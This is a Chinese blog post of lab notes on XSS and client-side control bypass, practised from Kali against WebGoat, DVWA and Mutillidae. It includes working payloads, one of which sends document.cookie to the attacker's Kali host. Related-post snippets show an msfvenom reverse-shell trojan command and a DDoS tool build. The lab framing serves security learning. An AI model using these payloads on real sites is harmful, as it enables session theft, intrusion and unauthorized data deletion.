vm虚拟机-kali使用跨站脚本攻击客户端

已于 2023-11-26 01:39:57 修改
阅读量136 收藏
点赞数 1
文章标签: 前端 xss
于 2023-11-26 01:33:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shaxiao_/article/details/134623367
版权

目录

1 使用浏览器绕过客户端控制

一、相关知识与技能

二、实验内容:

 2 识别跨站脚本漏洞

一、相关知识与技能

二、实验内容:

 3 利用 XSS 获取 Cookie

一、相关知识与技能

二、实验内容:

 4 利用 DOM XSS

一、相关知识与技能

二、实验内容:

使用跨站脚本攻击客户端

1 使用浏览器绕过客户端控制

一、相关知识与技能

通过检查器发现所有的按钮都是一个名称:action,它们的值是按钮被按下后要执行的操作。(这些可以通过看开发者工具中的network 选项卡看到)所以当发现SearchStaff,ViewProfile, ListStaff 这样的操作时,也许 DeleteProfile 可以达成不一样的效果。

二、实验内容:

1. 登陆 WebGoat,点击 Access ControlFlaws,转到 LAB:RoleBased Access Control→Stage 1:Bypass Business Layer Access Control。

2. 使用 tomcat 的登陆凭证(tom,tom)登陆这个表单,并用 F12 启用 firefox的开发者工具。

3. 来检查一下员工表单。

4. 转到开发者工具中的 Network 选项卡并单击 ViewProfile。

5. 单击 ListStaff 返回列表。

6. 更改为开发者工具中的 Inspector 选项卡。

7. 双击标记的值(105)将其改变为 101。

8. 再次点击 ViewProfile

9.WebGoat 给的目标是使用 tom 的账户删除 tom 的个人信息。

10.ViewProfile 按钮

11. 名称是 action,值为 ViewProfile,将其改为 DeleteProfile

12. 点击 DeleteProfile 后,即可完成目标任务。

 2 识别跨站脚本漏洞

一、相关知识与技能

XSS 漏洞发生在服务器端和客户端对输入执行弱验证或不进行验证,且输出没有正确编码的情况下。这意味着该应用程序允许引入 HTML 代码中使用的字符,并且在将它们发送到页面时,不进行任何编码(例如使用 HTML 转义<和>,以防止它们被解释为 HTML 或 Javascript 源代码)。

二、实验内容:

1. 将使用易受攻击的 Web 应用程序(DVWA)来完成这个小节。使用默认的管理凭据(admin 作为用户名和密码)登录,然后到 XSS reflected(反射 XSS)。

2. 测试漏洞的第一步是观察应用程序的正常响应。在文本框中填写一个名称字符串并且点击提交。

3. 应用程序使用的是输入的字符串。

4. 在文本框输入的任何内容都将出现在响应中。

5. 在普通输入的后面加上非常简单的脚本代码:

Bob<script>alert('xss')</script>

6.检查源代码。

 3 利用 XSS 获取 Cookie

一、相关知识与技能

XSS 此类的攻击中,必须有用户的交互才能触发漏洞,那么这种情况下由于攻击者并不知道何时用户才会点击或者触发漏洞,所以攻击者必须有一个可以时刻监听payload 是否被触发的服务器。

二、实验内容:

1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务。

2.然后登陆 DVWA,再转到 XSS reflection 下;

3.在文本框中输入以下内容(192.168.56.10 为 Kali 主机 IP 地址):

Bob<script>

document.write('<imgsrc="http://192.168.56.10:88/'+document.cookie+'">');

</script>

4.查看终端。

 4 利用 DOM XSS

一、相关知识与技能

首先分析了程序的流程,注意到它没有连接到服务器,因此向页面添加信息,并且它反回了用户给出的值。然后分析了将数据添加到浏览器内部存储的脚本代码,并注意到这些数据可能无法验证是否合法,而且通过innerHTML 属性呈现给用户。对于输入的值,这将意味着数据被视为 HTML 代码,而不是文本。

二、实验内容:

1.在易受攻击的虚拟机 VM_1 中,转到 Mutillidae II |OWASP 2013 | XSS | DOM | HTML5 Storage。

2.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的session。然后在“网络”选项卡中启用开发人员工具。

3.尝试添加一些数据,发现在开发者工具中并没有进行网络通信。

4.如果检查"AddNew"按钮,看到它在单击时调用了一个函数addItemToStorage。

5.转到 Debugger 选项卡并查找 addItemToStorage 函数。

6.尝试设置一个包含 HTML 代码的键值。

7.添加一个新条目,其中包含以下键值:

Cookbooktest <img src = X onerror  ="alert('DOM XSS')">

覃锦冬
关注
Kali常见攻击手段_kali攻击
weixin_51725318的博客
12-27 3036
Kali常见攻击手段
虚拟机中kali制作木马攻击脚本
weixin_54636850的博客
04-13 406
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(kali的ip) lport=5027(端口) -f exe -o /home/kali/Desktop/文件名.exe。设置所使用的payload(因为我们生成的木马程序是反向tcp的链接,所以这里也要采用同样是反向tcp链接的payload才能对应接收到待会的反向链接)2、将在桌面看到文件名.exe的文件,将此文件移到windows 7中。-f 设置木马的格式。
kali下Xerxes脚本实现DDOS攻击
我的学习笔记
02-28 3858
参考视频:https://www.youtube.com/watch?v=rEpSmCWTQcY1、cd /tmp git clone https://github.com/zanyarjamal/xerxes.git cd xerxes gcc xerxes.c -o xerxes ./xerxes 目标网站,www开头 端口,一般是80 #如...
Kali Linux Web 渗透测试秘籍 第八章 中间人攻击
龙哥盟
10-12 4万+
第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之间,通常是客户端和服务端通信线路的中间。这可以通过破坏原始频道之后拦截一方的消息并将它们转发(有时会有改变)给另一方来实现。让我们观察下面这个例子:Alice 连接到了 Web 服
让 WSL2 中的 Kali 虚拟机使用无线网卡
zBinny的专栏
05-04 1万+
让 WSL2 中的 Kali 虚拟机使用无线网卡为什么有这个项目改造 Kali,安装超级工具集WSL2 的改造思路编译内核代码并替换内核编译 USB/IP 工具在 Kali 中挂载无线网卡在 Windows 中提供 USB/IP 服务在 Kali 中启动 USB/IP,以接入 Windows 的 USB 设备加载无线网卡驱动,用 wifite 测试网卡破解功能后记 为什么有这个项目   最近在研究...
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4828
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
热门推荐
龙哥盟
10-14 5万+
第一章 配置 Kali Linux 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介在第一章中,我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍,并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。1.1 升级和更新 Kali在我们开始 Web 应用安全测试之前,我们需要确保我们拥有所有必要的最新
DAY40:攻击主机平台及常用工具
qq_49433473的博客
08-25 2488
攻击主机平台及常用工具、Kali Linux 渗透测试平台及常用工具、Windows 渗透测试平台及常用工具、PowerShell 常用指令、虚拟机概述
第1章 Kali Linux入门 一篇就够了
Sumarua的博客
08-07 2万+
文章目录第1章 Kali Linux入门1.1 Kali的发展简史1.2 Kali Linux工具包1.3 下载Kali Linux1.4 使用Kali Linux1.4.1 Live DVD方式1.4.2 硬盘安装1.4.3 安装在USB闪存上1.5 配置虚拟机1.5.1 安装客户端功能增强包1.5.2 网络设置1.5.3 文件夹共享1.5.4 快照备份1.5.5 导出虚拟机1.6 系统更新1.7 Kali Linux的网络服务1.7.1 HTTP1.7.2 MySQL1.7.3 SSH1.8 安装脆弱系
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2432
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
[ 内网渗透实战篇-1 ] 单域环境搭建与安装&域环境判断&域控定位&CS插件装载&CS上线
qq_51577576的博客
11-06 1162
[ 内网渗透基础篇-1 ] 单域环境搭建与安装&域环境判断&域控定位&CS插件装载&CS上线 1、掌握搭建单域环境以及域账户与普通账户区别 2、掌握域环境的判断、域控主机的定位的技巧 3、了解CS上线基础操作以及插件装载
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
weixin_30340617的博客
06-22 621
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于...
DDoS攻击模拟与Metasploitable渗透
zzr2zr的博客
01-04 7422
DDoS攻击模拟与Metasploitable渗透 Part.1 DDoS介绍和发展史 1.DDoS:Distributed Denial of Service,分布式拒绝服务攻击。 2.带宽消耗型攻击,所谓带宽消耗型攻击就是攻击者将提供网络服务的正常的带宽消耗殆尽,带宽消耗殆尽后就会造成网络堵塞,从而当正常的用户与服务器进行通信时无法提供正常服务。举vps的例子,vps服务器一般都有固定的带宽,...
使用ZAP的爬虫功能
weixin_64383696的博客
05-29 944
OWASP ZAP有非常多的功能,认证扫描也具有多种不同的登录认证方式,通常一款扫描器应当具备手工认证、表单认证、COOKIE认证、脚本录制等方式,本文只讲到了手工身份认证及表单认证,脚本的方式还没有认真去学习,在实际工作中应当多种尝试多种方式,用不同的方式去发现漏洞,提高漏洞发现机率。与其他爬行器一样,ZAP的爬行功能会跟随它在每一页找到的链接,包括在请求的范围内和它内部的链接。在Spider对话框中,我们可以判断爬行是否递归(在找到的目录中爬行)、设置起点和其他选项。开发的免费且开源的安全测试工具。
前端 Flex 布局语法详解
ning的博客
11-10 913
Flex是Flexible Box的缩写,意为“弹性布局”。它允许容器内的项目(子元素)自动调整大小,以适应不同屏幕尺寸和布局需求。如果需要行内Flex布局,可以使用Flex布局提供了一种强大而灵活的方式来创建响应式布局。通过理解并应用上述属性,你可以轻松地创建出复杂且适应不同屏幕尺寸的布局。随着现代浏览器对Flex布局的广泛支持,它已经成为前端开发中不可或缺的一部分。版权声明:本博客内容为原创,转载请保留原文链接及作者信息。参考文章CSDN - Flex布局详解菜鸟教程 - Flex 布局语法教程。
@RestController 源码解读:解决 Web 开发中 REST 服务的疑难杂症
狼堡灰太狼的博客
11-11 468
这里可以理解成,注解MyInterface2的value属性重写了注解MyInterface1的value属性,但重新的属性的返回类型必须相同。可以看出对于value这个属性来说,@Configuration注解中的值会重写@Component的value属性值,这有点像类之间的继承,子类可以重父类的方法。达到 @MyInterface1(value2="number1") 和 @MyInterface1(value1="number1") 的效果相同。JDK 17 引入 records 新特性。
前端基础】Javascript取整函数以及向零取整方式
最新发布
警警的博客
11-11 576
在JavaScript中,有多种方式可以对数字进行取整操作,即去掉小数部分,只保留整数部分。在JavaScript中,有多种方法可以对数字进行取整操作。这些方法各有特点,适用于不同的场景。方法会去掉一个数字的小数部分,返回其整数部分,但不进行四舍五入。在处理数字时,会将操作数转换为32位整数,从而截断小数部分。每种方法都有其适用的场景和限制,选择时需根据具体需求进行权衡。也是一种按位取整的方式,效果与。类似,会截断小数部分。
【Java Web】JSP实现数据传递和保存(上)九大内置对象 request
m0_66584716的博客
11-07 934
JSP(JavaServer Pages)提供了九个内置对象,这些对象在JSP页面中可以直接使用,无需显式声明。这些内置对象提供了对请求、响应、会话等常用功能的访问,使得开发者可以更方便地处理Web应用程序中的各种任务。
xss跨站脚本攻击kali
07-27
对于XSS跨站脚本攻击)和Kali Linux(一个流行的渗透测试工具)这两个话题,我可以分别给你一些简要的解释。 XSS跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站中注入恶意脚本,使得这些脚本在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值